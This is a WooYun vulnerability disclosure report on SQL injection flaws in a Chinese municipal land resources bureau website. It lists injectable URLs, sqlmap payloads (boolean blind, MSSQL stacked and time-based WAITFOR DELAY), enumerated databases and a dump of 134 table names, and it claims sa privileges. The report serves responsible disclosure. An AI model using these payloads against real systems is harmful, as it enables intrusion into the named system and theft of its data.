漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:某市国土资源局存在多处SQL注射sa权限
提交时间:2014-12-30 17:28
修复时间:2015-02-13 17:30
公开时间:2015-02-13 17:30
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2014-12-30: 细节已通知厂商并且等待厂商处理中 2015-01-04: 厂商已经确认,细节仅向厂商公开 2015-01-14: 细节向核心白帽子及相关领域专家公开 2015-01-24: 细节向普通白帽子公开 2015-02-03: 细节向实习白帽子公开 2015-02-13: 细节向公众公开
简要描述: 某市国土资源局存在多处SQL注射
详细说明: 仙桃市国土资源局存在多处SQL注射 http://old.xtgtzy.gov.cn/list.asp?classId=10 可能存在sql注入漏洞 http://old.xtgtzy.gov.cn/Article-photo.asp?ArticleID=309 可能存在sql注入漏洞 http://old.xtgtzy.gov.cn/chinese/Bs_DownloadShow.asp?Bs_DownID=104 可能存在sql注入漏洞 http://old.xtgtzy.gov.cn/chinese/Bs_NewsInfo.asp?Action=Co&ID=88 ID=88 可能存在sql注入漏洞 蹭的网 卡的要命 演示一处
http://old.xtgtzy.gov.cn/Article-photo.asp?ArticleID=309
--- Place: GET Parameter: ArticleID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ArticleID=309 AND 8228=8228 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ArticleID=309; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind T<code>
itle: Microsoft SQL Server/Sybase time-based blind Payload: ArticleID=309 WAITFOR DELAY '0:0:5'-- --- web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2008 </code>
available databases [13]: [*] [鍦熷湴鍒╃敤鐧昏鏁版嵁搴?014-12] [*] [鍦熷湴鍒╃敤鐧昏鏁版嵁搴?014-6] [*] [鍦熷湴鍒╃敤鐧昏鏁版嵁搴?014-8] [*] hy [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] xtgtbs [*] 鍦熷湴鍒╃敤鐧昏鏁版嵁搴?[*] 鍦熷湴鍒╃敤鐧昏鏁版嵁搴?0131018
Database: hy [134 tables] +-------------------+ | BGxxB | | Bs_Admin | | Bs_Book | | Bs_Book_dzxf | | Bs_Book_sqgk | | Bs_Company | | Bs_DownBigClass | | Bs_DownSmallClass | | Bs_Download | | Bs_Faq | | Bs_Honor | | Bs_Img | | Bs_Job | | Bs_Jobbook | | Bs_Links | | Bs_NewsCo | | Bs_NewsPr | | Bs_NewsYe | | Bs_OrderList | | Bs_PrBigClass | | Bs_PrBigClass3 | | Bs_PrSmallClass | | Bs_PrSmallClass3 | | Bs_Product | | Bs_ShopList | | Bs_SysData | | Bs_User | | ClXXb | | CyZlB | | CyzlType | | D99_CMD | | D99_Tmp | | DhClZtB | | DwLdxx | | DwUserB | | FbZtB | | HyHdBpB | | JGJC | | LdDnZw | | LdHdB | | LdHdClB | | LdHdSxRyB | | LdJb | | LdJtGj | | LdTel | | LdTxGjB | | LdXgRyXxB | | LdXgRyZz | | LdXzZw | | MmCdB | | NB_Column | | NB_Content | | NB_Content_aa | | NB_Ip | | NB_Link | | NB_Review | | NB_System | | NB_Top | | RyZW | | RyZc | | RyZzmm | | SGxxB | | SjJgZryxxB | | Sjksxxb | | Tab_Db | | Tab_Dbsy1 | | Tab_Dw | | Tab_Filelb | | Tab_JsB | | Tab_JsQx | | Tab_NoFile | | Tab_Title | | Tab_UserLog | | Tab_UserQx | | Tab_UserQx11 | | Tab_Users | | Tab_UsersJs | | Tab_Xzqh | | Tab_YesFile | | Tab_ZL | | Tab_module | | Tab_ofxx | | Tab_xxHfb | | Tab_xxb | | Tab_xxlb | | Unit_Fl | | VIEW1 | | Vote | | Vote_cj | | Vote_dj | | Vote_dj2 | | Vote_js | | Vote_jyxx | | Vote_sfxz | | Vote_sfxz1 | | Vote_txql | | Vote_xzsp | | Vote_zw | | XGxxB | | XjJgUserB | | XjLdTel | | XjLdXgRyXxB | | XjZryxxB | | Xjksxxb | | XjldxxB | | ZBZBB | | ZbLdYjB | | ZbLxB | | ZryxxB | | Zy_xxHfb | | Zy_xxb | | Zy_xxlb | | <%NoDown%> | | counters | | dtproperties | | email | | friend | | gwclb | | jjcd | | ksxxb | | ldxxB | | maildefault | | sbdata | | tddj | | vote_tddj | | vote_xk | | webcount | | xxfb | | zzbsGzzz | | 浠栭」鏉冨埄璇佷功 | | 鍥芥湁鍦熷湴10 | | 鍥芥湁鍦熷湴110 | | 鍦熷湴鐧昏淇℃伅 | | 闆嗕綋鍦熷湴10 | +-------------------+
sa权限
漏洞证明: 其他库不是不跑,是网速太卡。 。 网速不好,。瞅瞅这
修复方案: 版权声明:转载请注明来源 Yang @乌云
漏洞回应 厂商回应: 危害等级:高
漏洞Rank:11
确认时间:2015-01-04 14:46
厂商回复: CNVD确认所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
最新状态: 暂无
漏洞评价:
评论